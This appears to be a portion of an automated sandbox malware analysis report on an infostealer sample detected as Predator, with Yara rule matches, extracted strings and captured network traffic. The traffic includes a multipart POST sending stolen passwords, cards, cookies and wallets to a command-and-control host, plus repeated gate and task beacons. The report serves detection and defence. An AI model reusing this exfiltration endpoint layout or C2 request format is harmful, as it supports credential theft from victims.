                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.90.128.253/wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.90.128.253/wp-content/lock/task.php?hwid=CH84D70FD1B3
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.90.128.2538
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.90.128.253x
                  Source: update_222410.exe, 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.drString found in binary or memory: http://expression/newtonsoft.json.dll
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: nwY3YpWQVx.exe, 00000000.00000002.569907602.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378476557.000001C393879000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.379095852.000001C3938C3000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.379024467.000001C3938AC000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378328005.000001C39385F000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378872263.000001C3938A0000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 00000007.00000002.386427305.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 0000000C.00000002.412836167.00000000028B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: nwY3YpWQVx.exe, Zip.exe.0.drString found in binary or memory: http://ip-api.com/json/
                  Source: nwY3YpWQVx.exe, 00000000.00000002.569907602.0000000002FB8000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378476557.000001C393879000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com8
                  Source: nwY3YpWQVx.exe, 00000000.00000002.562469151.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.379024467.000001C3938AC000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.378328005.000001C39385F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.comx
                  Source: Newtonsoft.Json.dll.0.drString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: nwY3YpWQVx.exe, 00000000.00000002.562110821.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Zip.exe, 00000001.00000002.377449574.000001C3937E1000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 00000007.00000002.386427305.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, update_222410.exe, 0000000C.00000002.412735902.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: nwY3YpWQVx.exe, 00000000.00000003.311433877.000000001CA45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html)a
                  Source: nwY3YpWQVx.exe, 00000000.00000003.311433877.000000001CA45000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311719685.000000001CA45000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311606763.000000001CA45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlha
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: nwY3YpWQVx.exe, 00000000.00000003.314516472.000000001CA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers2
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: nwY3YpWQVx.exe, 00000000.00000003.314516472.000000001CA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerse
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: nwY3YpWQVx.exe, 00000000.00000003.311321980.000000001CA61000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311356951.000000001CA5B000.00000004.00000020.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000003.311401237.000000001CA5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comgE
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: nwY3YpWQVx.exe, 00000000.00000002.575537205.000000001DC52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: nwY3YpWQVx.exe, info.txt.0.drString found in binary or memory: https://gomorrah.pw
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                  Source: nwY3YpWQVx.exe, 00000000.00000002.571301182.0000000012E78000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571503300.0000000012EBD000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571730444.0000000012F2A000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571871801.0000000012F47000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571610150.0000000012F02000.00000004.00000800.00020000.00000000.sdmp, nwY3YpWQVx.exe, 00000000.00000002.571392472.0000000012EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: unknownHTTP traffic detected: POST /wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dace08a809cd1aHost: 13.90.128.253Content-Length: 794515Expect: 100-continue
                  Source: unknownDNS traffic detected: queries for: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253

                  E-Banking Fraud

                  barindex
                  Yara detected Predator
                  Source: Yara matchFile source: nwY3YpWQVx.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwY3YpWQVx.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: update_222410.exe PID: 3964, type: MEMORYSTR

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: nwY3YpWQVx.exe, type: SAMPLEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: nwY3YpWQVx.exe, type: SAMPLEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 1.0.Zip.exe.1c391990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 0.2.nwY3YpWQVx.exe.2b1b350.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 00000001.00000000.338062732.000001C391992000.00000002.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 00000000.00000002.563811537.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exe, type: DROPPEDMatched rule: Windows_Trojan_Lucifer_ce9d4cc8 Author: unknown
                  Source: nwY3YpWQVx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: nwY3YpWQVx.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
